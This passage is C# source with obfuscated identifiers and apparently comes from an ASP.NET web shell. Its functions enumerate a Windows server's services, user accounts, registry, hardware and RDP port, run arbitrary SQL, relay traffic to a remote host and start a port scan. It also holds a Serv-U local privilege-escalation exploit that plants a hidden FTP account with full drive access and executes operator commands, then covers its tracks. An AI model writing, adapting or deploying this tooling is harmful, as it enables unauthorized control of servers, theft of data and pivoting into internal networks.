 942 }
 943 if(i==3)
 944 {
 945 td.Text=dt.Rows[j]["Name"].ToString();
 946 tr.Controls.Add(td);
 947 }
 948 if(i==4)
 949 {
 950 td.Text=dt.Rows[j]["PathName"].ToString();
 951 tr.Controls.Add(td);
 952 }
 953 if(i==5)
 954 {
 955 string kOIo=dt.Rows[j]["State"].ToString();
 956 if(kOIo=="Running")
 957 {
 958 td.Text="<font color=green>"+kOIo+"</font>";
 959 }
 960 else
 961 {
 962 td.Text="<font color=red>"+kOIo+"</font>";
 963 }
 964 tr.Controls.Add(td);
 965 }
 966 if(i==6)
 967 {
 968 td.Text=dt.Rows[j]["StartMode"].ToString();
 969 tr.Controls.Add(td);
 970 }
 971 }
 972 vHCs.Controls.Add(tr);
 973 }
 974 }
 975 catch(Exception error)
 976 {
 977 oHpF();
 978 }
 979 }
 980 public void PLd()
 981 {
 982 try
 983 {
 984 WICxe();
 985 xWVQ.Visible=true;
 986 Bin_H2_Title.InnerText="User Information >>";
 987 DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
 988 foreach(DirectoryEntry child in TWQ.Children)
 989 {
 990 foreach(string name in child.Properties.PropertyNames)
 991 {
 992 PropertyValueCollection pvc=child.Properties[name];
 993 int c=pvc.Count;
 994 for(int i=0;i<c;i++)
 995 {
 996 if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
 997 {
 998 string bg=OKM();
 999 TableRow tr=new TableRow();
1000 tr.Attributes["onmouseover"]="this.className='focus';";
1001 tr.CssClass=bg;
1002 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1003 TableCell td=new TableCell();
1004 td.Text=name;
1005 tr.Controls.Add(td);
1006 TableCell td1=new TableCell();
1007 td1.Text=pvc[i].ToString();
1008 tr.Controls.Add(td1);
1009 VPa.Controls.Add(tr);
1010 }
1011 }
1012 }
1013 TableRow trn=new TableRow();
1014 for(int x=1;x<3;x++)
1015 {
1016 TableCell tdn=new TableCell();
1017 tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1018 trn.Controls.Add(tdn);
1019 VPa.Controls.Add(trn);
1020 }
1021 }
1022 }
1023 catch(Exception error)
1024 {
1025 xseuB(error.Message);
1026 }
1027 }
1028 public void iLVUT()
1029 {
1030 try
1031 {
1032 WICxe();
1033 xWVQ.Visible=true;
1034 Bin_H2_Title.InnerText="User Information >>";
1035 DataTable user=cCf("Win32_UserAccount");
1036 for(int i=0;i<user.Rows.Count;i++)
1037 {
1038 for(int j=0;j<user.Columns.Count;j++)
1039 {
1040 string bg=OKM();
1041 TableRow tr=new TableRow();
1042 tr.Attributes["onmouseover"]="this.className='focus';";
1043 tr.CssClass=bg;
1044 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1045 TableCell td=new TableCell();
1046 td.Text=user.Columns[j].ToString();
1047 tr.Controls.Add(td);
1048 TableCell td1=new TableCell();
1049 td1.Text=user.Rows[i][j].ToString();
1050 tr.Controls.Add(td1);
1051 VPa.Controls.Add(tr);
1052 }
1053 TableRow trn=new TableRow();
1054 for(int x=1;x<3;x++)
1055 {
1056 TableCell tdn=new TableCell();
1057 tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1058 trn.Controls.Add(tdn);
1059 VPa.Controls.Add(trn);
1060 }
1061 }
1062 }
1063 catch(Exception error)
1064 {
1065 PLd();
1066 }
1067 }
1068 public void pDVM()
1069 {
1070 try
1071 {
1072 RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
1073 string IKjwH=DdmPl(EeZ,"PortNumber");
1074 RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
1075 int cpu=izN.SubKeyCount;
1076 RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
1077 string NPPZ=DdmPl(mQII,"ProcessorNameString");
1078 WICxe();
1079 ghaB.Visible=true;
1080 Bin_H2_Title.InnerText="System Information >>";
1081 Bin_H2_Mac.InnerText="MAC Information >>";
1082 Bin_H2_Driver.InnerText="Driver Information >>";
1083 StringBuilder yEwc=new StringBuilder();
1084 StringBuilder hwJeS=new StringBuilder();
1085 StringBuilder jXkaE=new StringBuilder();
1086 yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
1087 yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
1088 yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
1089 yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
1090 yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
1091 yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
1092 yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
1093 yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
1094 DataTable BIOS=cCf("Win32_BIOS");
1095 yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
1096 yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
1097 yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
1098 DataTable upM=cCf("Win32_PhysicalMemory");
1099 Int64 oZnZV=0;
1100 for(int i=0;i<upM.Rows.Count;i++)
1101 {
1102 oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
1103 }
1104 yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
1105 DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
1106 for(int i=0;i<dOza.Rows.Count;i++)
1107 {
1108 hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
1109 if(dOza.Rows[i]["MACAddress"]!=string.Empty)
1110 {
1111 hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
1112 }
1113 }
1114 DataTable Driver=cCf("Win32_SystemDriver");
1115 for (int i=0; i<Driver.Rows.Count; i++)
1116 {
1117 jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
1118 if (Driver.Rows[i]["PathName"]!=string.Empty)
1119 {
1120 jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
1121 }
1122 else
1123 {
1124 jXkaE.Append("No path information");
1125 }
1126 jXkaE.Append("</li>");
1127 }
1128 Bin_Ul_Sys.InnerHtml=yEwc.ToString();
1129 Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
1130 Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
1131 }
1132 catch(Exception error)
1133 {
1134 xseuB(error.Message);
1135 }
1136 }
1137 public void ADCpk()
1138 {
1139 WICxe();
1140 APl.Visible=true;
1141 Bin_H2_Title.InnerText="Serv-U Exec >>";
1142 }
1143 public void lDODR()
1144 {
1145 string JGGg=string.Empty;
1146 string user=dNohJ.Value;
1147 string pass=NMd.Value;
1148 int port=Int32.Parse(HlQl.Value);
1149 string cmd=mHbjB.Value;
1150 string CRtK="user "+user+"\r\n";
1151 string jnNG="pass "+pass+"\r\n";
1152 string site="SITE MAINTENANCE\r\n";
1153 string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
1154 string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
1155 string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
1156 string zexn="QUIT\r\n";
1157 UHlA.Visible=true;
1158 try
1159 {
1160 tcp.Connect("127.0.0.1",port);
1161 tcp.ReceiveBufferSize=1024;
1162 NS=tcp.GetStream();
1163 Rev(NS);
1164 ZJiM(NS,CRtK);
1165 Rev(NS);
1166 ZJiM(NS,jnNG);
1167 Rev(NS);
1168 ZJiM(NS,site);
1169 Rev(NS);
1170 ZJiM(NS,mtoJb);
1171 Rev(NS);
1172 ZJiM(NS,sutI);
1173 Rev(NS);
1174 ZJiM(NS,iVDT);
1175 Rev(NS);
1176 Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
1177 zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
1178 NS1=zvxm.GetStream();
1179 Rev(NS1);
1180 ZJiM(NS1,"user bin\r\n");
1181 Rev(NS1);
1182 ZJiM(NS1,"pass binftp\r\n");
1183 Rev(NS1);
1184 ZJiM(NS1,"site exec "+cmd+"\r\n");
1185 Rev(NS1);
1186 ZJiM(NS1,"quit\r\n");
1187 Rev(NS1);
1188 zvxm.Close();
1189 ZJiM(NS,mtoJb);
1190 Rev(NS);
1191 tcp.Close();
1192 }
1193 catch(Exception error)
1194 {
1195 xseuB(error.Message);
1196 }
1197 }
1198 protected void Rev(NetworkStream instream)
1199 {
1200 string FTBtf=string.Empty;
1201 if(instream.CanRead)
1202 {
1203 byte[] uPZ=new byte[1024];
1204 do
1205 {
1206 System.Threading.Thread.Sleep(50);
1207 int len=instream.Read(uPZ,0,uPZ.Length);
1208 FTBtf+=Encoding.Default.GetString(uPZ,0,len);
1209 }
1210 while(instream.DataAvailable);
1211 }
1212 Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
1213 }
1214 protected void ZJiM(NetworkStream instream,string Sendstr)
1215 {
1216 if(instream.CanWrite)
1217 {
1218 byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
1219 instream.Write(uPZ,0,uPZ.Length);
1220 }
1221 Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
1222 }
1223 public void xFhz()
1224 {
1225 WICxe();
1226 kkHN.Visible=true;
1227 Bin_H2_Title.InnerText="RegShell >>";
1228 string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1229 vyX.Text="";
1230 foreach(string rootkey in txc.Split('|'))
1231 {
1232 vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
1233 }
1234 lFAvw();
1235 }
1236 protected void lFAvw()
1237 {
1238 qPdI.Text="";
1239 string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1240 TableRow tr;
1241 TableCell tc;
1242 foreach(string rootkey in txc.Split('|'))
1243 {
1244 tr=new TableRow();
1245 tc=new TableCell();
1246 string bg=OKM();
1247 tr.Attributes["onmouseover"]="this.className='focus';";
1248 tr.CssClass=bg;
1249 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1250 tc.Width=Unit.Parse("40%");
1251 tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
1252 tr.Cells.Add(tc);
1253 tc=new TableCell();
1254 tc.Width=Unit.Parse("60%");
1255 tc.Text="&lt;RootKey&gt;";
1256 tr.Cells.Add(tc);
1257 pLWD.Rows.Add(tr);
1258 }
1259 }
1260 protected void tpRQ(string Reg_Path)
1261 {
1262 if(!Reg_Path.EndsWith("\\"))
1263 {
1264 Reg_Path=Reg_Path+"\\";
1265 }
1266 qPdI.Text=Reg_Path;
1267 string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
1268 cJG=Regex.Replace(cJG,@"\\+","\\");
1269 TableRow tr=new TableRow();
1270 TableCell tc=new TableCell();
1271 string bg=OKM();
1272 tr.Attributes["onmouseover"]="this.className='focus';";
1273 tr.CssClass=bg;
1274 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1275 tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
1276 tc.Attributes["colspan"]="2" ;
1277 tr.Cells.Add(tc);
1278 pLWD.Rows.Add(tr);
1279 try
1280 {
1281 string subpath;
1282 string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
1283 RegistryKey rk=null;
1284 RegistryKey sk;
1285 if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
1286 {
1287 rk=Registry.LocalMachine;
1288 }
1289 else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
1290 {
1291 rk=Registry.ClassesRoot;
1292 }
1293 else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
1294 {
1295 rk=Registry.CurrentUser;
1296 }
1297 else if(Reg_Path.StartsWith("HKEY_USERS"))
1298 {
1299 rk=Registry.Users;
1300 }
1301 else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
1302 {
1303 rk=Registry.CurrentConfig;
1304 }
1305 if(kDgkX.Length>1)
1306 {
1307 sk=rk.OpenSubKey(kDgkX);
1308 }
1309 else
1310 {
1311 sk=rk;
1312 }
1313 foreach(string innerSubKey in sk.GetSubKeyNames())
1314 {
1315 tr=new TableRow();
1316 tc=new TableCell();
1317 bg=OKM();
1318 tr.Attributes["onmouseover"]="this.className='focus';";
1319 tr.CssClass=bg;
1320 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1321 tc.Width=Unit.Parse("40%");
1322 tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
1323 tr.Cells.Add(tc);
1324 tc=new TableCell();
1325 tc.Width=Unit.Parse("60%");
1326 tc.Text="&lt;SubKey&gt;";
1327 tr.Cells.Add(tc);
1328 pLWD.Rows.Add(tr);
1329 }
1330 TableRow cKVA=new TableRow();
1331 cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
1332 cKVA.Attributes["bgcolor"]="#dddddd";
1333 TableCell JlmW=new TableCell();
1334 JlmW.Attributes["colspan"]="2" ;
1335 JlmW.Attributes["height"]="5";
1336 cKVA.Cells.Add(JlmW);
1337 pLWD.Rows.Add(cKVA);
1338 foreach(string strValueName in sk.GetValueNames())
1339 {
1340 tr=new TableRow();
1341 tc=new TableCell();
1342 bg=OKM();
1343 tr.Attributes["onmouseover"]="this.className='focus';";
1344 tr.CssClass=bg;
1345 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1346 tc.Width=Unit.Parse("40%");
1347 tc.Text=strValueName;
1348 tr.Cells.Add(tc);
1349 tc=new TableCell();
1350 tc.Width=Unit.Parse("60%");
1351 tc.Text=DdmPl(sk,strValueName);
1352 tr.Cells.Add(tc);
1353 pLWD.Rows.Add(tr);
1354 }
1355 }
1356 catch(Exception error)
1357 {
1358 xseuB(error.Message);
1359 }
1360 }
1361 public string DdmPl(RegistryKey sk,string strValueName)
1362 {
1363 object uPZ;
1364 string RaTGr="";
1365 try
1366 {
1367 uPZ=sk.GetValue(strValueName,"NULL");
1368 if(uPZ.GetType()==typeof(byte[]))
1369 {
1370 foreach(byte tmpbyte in(byte[])uPZ)
1371 {
1372 if((int)tmpbyte<16)
1373 {
1374 RaTGr+="0";
1375 }
1376 RaTGr+=tmpbyte.ToString("X");
1377 }
1378 }
1379 else if(uPZ.GetType()==typeof(string[]))
1380 {
1381 foreach(string tmpstr in(string[])uPZ)
1382 {
1383 RaTGr+=tmpstr;
1384 }
1385 }
1386 else
1387 {
1388 RaTGr=uPZ.ToString();
1389 }
1390 }
1391 catch(Exception error)
1392 {
1393 xseuB(error.Message);
1394 }
1395 return RaTGr;
1396 }
1397 public void vNCHZ()
1398 {
1399 WICxe();
1400 YwLB.Visible=true;
1401 Bin_H2_Title.InnerText="PortScan >>";
1402 }
1403 public void rAhe()
1404 {
1405 WICxe();
1406 iDgmL.Visible=true;
1407 dQIIF.Visible=false;
1408 Bin_H2_Title.InnerText="DataBase >>";
1409 }
1410 protected void OUj()
1411 {
1412 if(Dtdr.State==ConnectionState.Closed)
1413 {
1414 try
1415 {
1416 Dtdr.ConnectionString=MasR.Text;
1417 Kkvb.Connection=Dtdr;
1418 Dtdr.Open();
1419 }
1420 catch(Exception Error)
1421 {
1422 xseuB(Error.Message);
1423 }
1424 }
1425 }
1426 protected void fUzE()
1427 {
1428 if(Dtdr.State==ConnectionState.Open)
1429 Dtdr.Close();
1430 Dtdr.Dispose();
1431 Kkvb.Dispose();
1432 }
1433 public DataTable CYUe(string sqlstr)
1434 {
1435 OleDbDataAdapter da=new OleDbDataAdapter();
1436 DataTable Dstog=new DataTable();
1437 try
1438 {
1439 OUj();
1440 Kkvb.CommandType=CommandType.Text;
1441 Kkvb.CommandText=sqlstr;
1442 da.SelectCommand=Kkvb;
1443 da.Fill(Dstog);
1444 }
1445 catch(Exception)
1446 {
1447 }
1448 finally
1449 {
1450 fUzE();
1451 }
1452 return Dstog;
1453 }
1454 public DataTable[] Bin_Data(string query)
1455 {
1456 ArrayList list=new ArrayList();
1457 try
1458 {
1459 string str;
1460 OUj();
1461 query=query+"\r\n";
1462 MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
1463 int EmRX=0;
1464 for(int i=0;i<gcod.Count;i++)
1465 {
1466 Match FJD=gcod[i];
1467 str=query.Substring(EmRX,FJD.Index-EmRX);
1468 if(str.Trim().Length>0)
1469 {
1470 OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
1471 Kkvb.CommandType=CommandType.Text;
1472 Kkvb.CommandText=str.Trim();
1473 FgzeQ.SelectCommand=Kkvb;
1474 DataSet cDPp=new DataSet();
1475 FgzeQ.Fill(cDPp);
1476 for(int j=0;j<cDPp.Tables.Count;j++)
1477 {
1478 list.Add(cDPp.Tables[j]);
1479 }
1480 }
1481 EmRX=FJD.Index+3;
1482 }
1483 str=query.Substring(EmRX,query.Length-EmRX);
1484 if(str.Trim().Length>0)
1485 {
1486 OleDbDataAdapter VwB=new OleDbDataAdapter();
1487 Kkvb.CommandType=CommandType.Text;
1488 Kkvb.CommandText=str.Trim();
1489 VwB.SelectCommand=Kkvb;
1490 DataSet arG=new DataSet();
1491 VwB.Fill(arG);
1492 for(int k=0;k<arG.Tables.Count;k++)
1493 {
1494 list.Add(arG.Tables[k]);
1495 }
1496 }
1497 }
1498 catch(SqlException e)
1499 {
1500 xseuB(e.Message);
1501 rom.Visible=false;
1502 }
1503 return(DataTable[])list.ToArray(typeof(DataTable));
1504 }
1505 public void JIAKU(string instr)
1506 {
1507 try
1508 {
1509 OUj();
1510 Kkvb.CommandType=CommandType.Text;
1511 Kkvb.CommandText=instr;
1512 Kkvb.ExecuteNonQuery();
1513 }
1514 catch(Exception e)
1515 {
1516 xseuB(e.Message);
1517 }
1518 }
1519 public void dwgT()
1520 {
1521 try
1522 {
1523 OUj();
1524 if(WYmo.SelectedItem.Text=="MSSQL")
1525 {
1526 if(Pvf.SelectedItem.Value!="")
1527 {
1528 Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
1529 }
1530 }
1531 DataTable[] jxF=null;
1532 jxF=Bin_Data(jHIy.InnerText);
1533 if(jxF!=null && jxF.Length>0)
1534 {
1535 for(int j=0;j<jxF.Length;j++)
1536 {
1537 rom.PreRender+=new EventHandler(lRavM);
1538 rom.DataSource=jxF[j];
1539 rom.DataBind();
1540 for(int i=0;i<rom.Items.Count;i++)
1541 {
1542 string bg=OKM();
1543 rom.Items[i].CssClass=bg;
1544 rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1545 rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1546 }
1547 }
1548 }
1549 else
1550 {
1551 rom.DataSource=null;
1552 rom.DataBind();
1553 }
1554 rom.Visible=true;
1555 }
1556 catch(Exception e)
1557 {
1558 xseuB(e.Message);
1559 rom.Visible=false;
1560 }
1561 }
1562 public void xTZY()
1563 {
1564 try
1565 {
1566 if(WYmo.SelectedItem.Text=="MSSQL")
1567 {
1568 if(Pvf.SelectedItem.Value=="")
1569 {
1570 rom.DataSource=null;
1571 rom.DataBind();
1572 return;
1573 }
1574 }
1575 OUj();
1576 DataTable zKvOw=new DataTable();
1577 DataTable jxF=new DataTable();
1578 DataTable baVJV=new DataTable();
1579 if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
1580 {
1581 Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
1582 }
1583 zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
1584 jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
1585 foreach(DataRow dr in zKvOw.Rows)
1586 {
1587 jxF.ImportRow(dr);
1588 }
1589 jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
1590 rom.PreRender+=new EventHandler(lRavM);
1591 rom.DataSource=jxF;
1592 rom.DataBind();
1593 for(int i=0;i<rom.Items.Count;i++)
1594 {
1595 string bg=OKM();
1596 rom.Items[i].CssClass=bg;
1597 rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1598 rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1599 }
1600 rom.Visible=true;
1601 }
1602 catch(Exception e)
1603 {
1604 xseuB(e.Message);
1605 rom.Visible=false;
1606 }
1607 }
1608 private void lRavM(object sender,EventArgs e)
1609 {
1610 DataGrid d=(DataGrid)sender;
1611 foreach(DataGridItem item in d.Items)
1612 {
1613 foreach(TableCell t in item.Cells)
1614 {
1615 t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
1616 }
1617 }
1618 }
1619 public void vCf()
1620 {
1621 dQIIF.Visible=true;
1622 try
1623 {
1624 jHIy.InnerHtml=string.Empty;
1625 if(WYmo.SelectedItem.Text=="MSSQL")
1626 {
1627 rom.Visible=false;
1628 uXevN.Visible=true;
1629 irTU.Visible=true;
1630 OUj();
1631 DataTable ver=CYUe(@"SELECT @@VERSION");
1632 DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
1633 DataTable cdb=CYUe(@"SELECT DB_NAME()");
1634 DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
1635 DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
1636 string jHlh=ver.Rows[0][0].ToString();
1637 string dbo=string.Empty;
1638 if(YKrm.Rows[0][0].ToString()=="1")
1639 {
1640 dbo="db_owner";
1641 }
1642 else
1643 {
1644 dbo="public";
1645 }
1646 if(rol.Rows[0][0].ToString()=="1")
1647 {
1648 dbo="<font color=blue>sa</font>";
1649 }
1650 string db_name=string.Empty;
1651 foreach(ListItem item in FGEy.Items)
1652 {
1653  if(item.Selected=true)
1654  {
1655  item.Selected=false;
1656  }
1657 }
1658 Pvf.Items.Clear();
1659 Pvf.Items.Add("-- Select a DataBase --");
1660 Pvf.Items[0].Value="";
1661 for(int i=0;i<dbs.Rows.Count;i++)
1662 {
1663 db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
1664 Pvf.Items.Add(dbs.Rows[i][0].ToString());
1665 }
1666 irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
1667 }
1668 else
1669 {
1670 uXevN.Visible=false;
1671 irTU.Visible=false;
1672 xTZY();
1673 }
1674 }
1675 catch(Exception e)
1676 {
1677 dQIIF.Visible=false;
1678 }
1679 }
1680 public void MHLv()
1681 {
1682 WICxe();
1683 hOWTm.Visible=true;
1684 Bin_H2_Title.InnerText="PortMap >>";
1685 }
1686 public class PortForward
1687 {
1688 public string Localaddress;
1689 public int LocalPort;
1690 public string RemoteAddress;
1691 public int RemotePort;
1692 string type;
1693 Socket ltcpClient;
1694 Socket rtcpClient;
1695 Socket server;
1696 byte[] DPrPL=new byte[2048];
1697 byte[] wvZv=new byte[2048];
1698 public struct session
1699 {
1700 public Socket rdel;
1701 public Socket ldel;
1702 public int llen;
1703 public int rlen;
1704 }
1705 public static IPEndPoint mtJ(string host,int port)
1706 {
1707 IPEndPoint iep=null;
1708 IPHostEntry aGN=Dns.Resolve(host);
1709 IPAddress rmt=aGN.AddressList[0];
1710 iep=new IPEndPoint(rmt,port);
1711 return iep;
1712 }
1713 public void Start(string Rip,int Rport,string lip,int lport)
1714 {
1715 try
1716 {
1717 LocalPort=lport;
1718 RemoteAddress=Rip;
1719 RemotePort=Rport;
1720 Localaddress=lip;
1721 rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1722 ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1723 rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
1724 }
1725 catch (Exception ex) { }
1726 }
1727 protected void iiGFO(IAsyncResult ar)
1728 {
1729 try
1730 {
1731 session RKXy=new session();
1732 RKXy.ldel=ltcpClient;
1733 RKXy.rdel=rtcpClient;
1734 ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
1735 }
1736 catch (Exception ex) { }
1737 }
1738 protected void VTp(IAsyncResult ar)
1739 {
1740 try
1741 {
1742 session RKXy=(session)ar.AsyncState;
1743 ltcpClient.EndConnect(ar);
1744 RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
1745 RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
1746 }
1747 catch (Exception ex) { }
1748 }
1749 private void LFYM(IAsyncResult ar)
1750 {
1751 try
1752 {
1753 session RKXy=(session)ar.AsyncState;
1754 int Ret=RKXy.rdel.EndReceive(ar);
1755 if (Ret>0)
1756 ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
1757 else lyTOK();
1758 }
1759 catch (Exception ex) { }
1760 }
1761 private void JTcp(IAsyncResult ar)
1762 {
1763 try
1764 {
1765 session RKXy=(session)ar.AsyncState;
1766 RKXy.ldel.EndSend(ar);
1767 RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
1768 }
1769 catch (Exception ex) { }
1770 }
1771 private void xPS(IAsyncResult ar)
1772 {
1773 try
1774 {
1775 session RKXy=(session)ar.AsyncState;
1776 int Ret=RKXy.ldel.EndReceive(ar);
1777 if (Ret>0)
1778 RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
1779 else lyTOK();
1780 }
1781 catch (Exception ex) { }
1782 }
1783 private void IZU(IAsyncResult ar)
1784 {
1785 try
1786 {
1787 session RKXy=(session)ar.AsyncState;
1788 RKXy.rdel.EndSend(ar);
1789 RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
1790 }
1791 catch (Exception ex) { }
1792 }
1793 public void lyTOK()
1794 {
1795 try
1796 {
1797 if (ltcpClient!=null)
1798 {
1799 ltcpClient.Close();
1800 }
1801 if (rtcpClient!=null)
1802 rtcpClient.Close();
1803 }
1804 catch (Exception ex) { }
1805 }
1806 }
1807 protected void vuou()
1808 {
1809 PortForward gYP=new PortForward();
1810 gYP.lyTOK();
1811 }
1812 protected void ruQO()
1813 {
1814 PortForward gYP=new PortForward();
1815 gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
1816 }
1817 public string mRDl(string instr)
1818 {
1819 string tmp=null;
1820 try
1821 {
1822 tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
1823 }
1824 catch(Exception e)
1825 {
1826 }
1827 return tmp;
1828 }
1829 public void VikG()
1830 {
1831 string[] OTV=lOmX.Text.ToString().Split(',');
1832 for(int i=0;i<OTV.Length;i++)
1833 {
1834 IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
1835 }
1836 try
1837 {
1838 Thread[] kbXY=new Thread[IVc.Count];
1839 int sdO=0;
1840 for(sdO=0;sdO<IVc.Count;sdO++)
1841 {
